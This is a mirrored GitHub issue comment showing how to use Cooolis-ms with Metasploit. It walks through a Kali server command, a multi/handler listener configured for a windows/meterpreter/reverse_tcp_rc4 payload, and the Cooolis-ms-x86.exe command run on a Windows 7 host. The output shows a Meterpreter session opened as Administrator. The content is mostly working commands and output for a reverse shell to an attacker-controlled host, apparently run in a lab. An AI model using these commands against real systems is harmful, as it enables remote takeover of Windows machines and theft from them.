Giter VIP home page Giter VIP logo

Comments (1)

Rvn0xsy avatar Rvn0xsy commented on July 21, 2024

将options与Cooolis-ms的-s参数对应即可

Kali Linux

IP: 192.168.3.128

python3 server.py -U msf -P msf -H 127.0.0.1 -p 55553 -s -v -l 8899 -S 192.168.3.128

msfconsole

msf5 exploit(multi/handler) > options 

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp_rc4):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   EXITFUNC     process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST        192.168.3.128    yes       The listen address (an interface may be specified)
   LPORT        8876             yes       The listen port
   RC4PASSWORD  fsm              yes       Password to derive RC4 key from


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

Windows 7

IP: 192.168.3.129

Cooolis-ms-x86.exe -p windows/meterpreter/reverse_tcp_rc4 -s LHOST=192.168.3.128,LPORT=8876,RC4PASSWORD=fsm,EXITFUNC=process -H 192.168.3.128 -P 8899

then...

msf5 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.3.128:8876 
msf5 exploit(multi/handler) > [*] Sending stage (180295 bytes) to 192.168.3.129
[*] Meterpreter session 1 opened (192.168.3.128:8876 -> 192.168.3.129:49298) at 2019-12-08 08:30:50 -0500

msf5 exploit(multi/handler) > sessions -i 1 
[*] Starting interaction with 1...

meterpreter > getuid 
Server username: VMWARE-545451\Administrator
meterpreter >

from cooolis-ms.

Related Issues (8)

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.